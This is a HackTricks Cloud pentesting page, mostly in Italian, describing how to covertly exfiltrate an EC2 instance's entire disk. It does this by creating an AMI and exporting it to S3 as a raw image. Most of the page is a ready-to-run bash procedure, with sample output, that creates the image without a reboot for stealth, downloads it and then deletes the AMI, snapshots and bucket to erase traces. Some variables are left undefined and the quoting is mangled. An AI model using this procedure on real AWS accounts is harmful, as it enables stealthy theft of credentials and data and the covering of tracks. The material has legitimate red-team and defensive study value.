HackTricks CloudAWS – Covert Disk Exfiltration via AMI Store-to-S3 (CreateStoreImageTask)
Tip
Impara e pratica il hacking AWS:
HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP:HackTricks Training GCP Red Team Expert (GRTE)
HackTricks Training Azure Red Team Expert (AzRTE)
Supporta HackTricks
- Controlla i piani di abbonamento!
- Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @hacktricks_live.
- Condividi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repos su github.
Sommario
Abuse EC2 AMI export-to-S3 per esfiltrare l’intero disco di un’istanza EC2 come singola immagine raw memorizzata in S3, quindi scaricarla fuori banda. Questo evita la condivisione di snapshot e produce un oggetto per AMI.
Requisiti
- EC2:
ec2:CreateImage,ec2:CreateStoreImageTask,ec2:DescribeStoreImageTaskssull’istanza/AMI target - S3 (stessa Region):
s3:PutObject,s3:GetObject,s3:ListBucket,s3:AbortMultipartUpload,s3:PutObjectTagging,s3:GetBucketLocation - KMS decrypt sulla chiave che protegge gli snapshot AMI (se è abilitata la cifratura predefinita di EBS)
- Policy del bucket S3 che si fida del principal di servizio
vmie.amazonaws.com(vedi sotto)
Impatto
- Acquisizione completa offline del disco root dell’istanza in S3 senza condividere snapshot o copiare tra account.
- Permette analisi forense furtiva di credenziali, configurazione e contenuti del filesystem dall’immagine raw esportata.
Come esfiltrare via AMI Store-to-S3
- Note:
- Il bucket S3 deve essere nella stessa Region dell’AMI.
- In
us-east-1,create-bucketnon deve includere--create-bucket-configuration. --no-rebootcrea un’immagine crash-consistente senza arrestare l’istanza (più furtivo ma meno consistente).
Step-by-step commands
```bash # Vars REGION=us-east-1 INSTANCE_ID=1) Create S3 bucket (same Region)
if [ “$REGION” = “us-east-1” ]; then aws s3api create-bucket –bucket “$BUCKET” –region “$REGION” else aws s3api create-bucket –bucket “$BUCKET” –create-bucket-configuration LocationConstraint=$REGION –region “$REGION” fi
2) (Recommended) Bucket policy to allow VMIE service to write the object
ACCOUNT_ID=$(aws sts get-caller-identity –query Account –output text) cat > /tmp/bucket-policy.json <<POL { “Version”: “2012-10-17”, “Statement”: [ { “Sid”: “AllowVMIEPut”, “Effect”: “Allow”, “Principal”: {“Service”: “vmie.amazonaws.com”}, “Action”: [ “s3:PutObject”, “s3:AbortMultipartUpload”, “s3:ListBucket”, “s3:GetBucketLocation”, “s3:GetObject”, “s3:PutObjectTagging” ], “Resource”: [ “arn:aws:s3:::$BUCKET”, “arn:aws:s3:::$BUCKET/” ], “Condition”: { “StringEquals”: {“aws:SourceAccount”: “$ACCOUNT_ID”}, “ArnLike”: {“aws:SourceArn”: “arn:aws:ec2:$REGION:$ACCOUNT_ID:image/ami-”} } } ] } POL aws s3api put-bucket-policy –bucket “$BUCKET” –policy file:///tmp/bucket-policy.json
3) Create an AMI of the victim (stealthy: do not reboot)
AMI_ID=$(aws ec2 create-image –instance-id “$INSTANCE_ID” –name exfil-$(date +%s) –no-reboot –region “$REGION” –query ImageId –output text)
4) Wait until the AMI is available
aws ec2 wait image-available –image-ids “$AMI_ID” –region “$REGION”
5) Store the AMI to S3 as a single object (raw disk image)
OBJKEY=$(aws ec2 create-store-image-task –image-id “$AMI_ID” –bucket “$BUCKET” –region “$REGION” –query ObjectKey –output text)
echo “Object in S3: s3://$BUCKET/$OBJKEY”
6) Poll the task until it completes
until [ “$(aws ec2 describe-store-image-tasks –image-ids “$AMI_ID” –region “$REGION”
–query StoreImageTaskResults[0].StoreTaskState –output text)“ = “Completed” ]; do
aws ec2 describe-store-image-tasks –image-ids “$AMI_ID” –region “$REGION”
–query StoreImageTaskResults[0].StoreTaskState –output text
sleep 10
done
7) Prove access to the exported image (download first 1MiB)
aws s3api head-object –bucket “$BUCKET” –key “$OBJKEY” –region “$REGION” aws s3api get-object –bucket “$BUCKET” –key “$OBJKEY” –range bytes=0-1048575 /tmp/ami.bin –region “$REGION” ls -l /tmp/ami.bin
8) Cleanup (deregister AMI, delete snapshots, object & bucket)
aws ec2 deregister-image –image-id “$AMI_ID” –region “$REGION”
for S in $(aws ec2 describe-images –image-ids “$AMI_ID” –region “$REGION”
–query Images[0].BlockDeviceMappings[].Ebs.SnapshotId –output text); do
aws ec2 delete-snapshot –snapshot-id “$S” –region “$REGION”
done
aws s3 rm “s3://$BUCKET/$OBJKEY” –region “$REGION”
aws s3 rb “s3://$BUCKET” –force –region “$REGION”
</details>
## Esempio di evidenza
- `describe-store-image-tasks` transizioni:
```text
InProgress
Completed
- Metadati oggetto S3 (esempio):
{
"AcceptRanges": "bytes",
"LastModified": "2025-10-08T01:31:46+00:00",
"ContentLength": 399768709,
"ETag": "\"c84d216455b3625866a58edf294168fd-24\"",
"ContentType": "application/octet-stream",
"ServerSideEncryption": "AES256",
"Metadata": {
"ami-name": "exfil-1759887010",
"ami-owner-account": "<account-id>",
"ami-store-date": "2025-10-08T01:31:45Z"
}
}
- Il download parziale dimostra l’accesso all’oggetto:
ls -l /tmp/ami.bin
# -rw-r--r-- 1 user wheel 1048576 Oct 8 03:32 /tmp/ami.bin
Permessi IAM richiesti
- EC2:
CreateImage,CreateStoreImageTask,DescribeStoreImageTasks - S3 (sul bucket di esportazione):
PutObject,GetObject,ListBucket,AbortMultipartUpload,PutObjectTagging,GetBucketLocation - KMS: Se gli snapshot AMI sono encrypted, consentire decrypt per la EBS KMS key usata dagli snapshot
Tip
Impara e pratica il hacking AWS:
Impara e pratica il hacking GCP:Supporta HackTricks
- Controlla i piani di abbonamento!
- Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @hacktricks_live.
- Condividi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repos su github.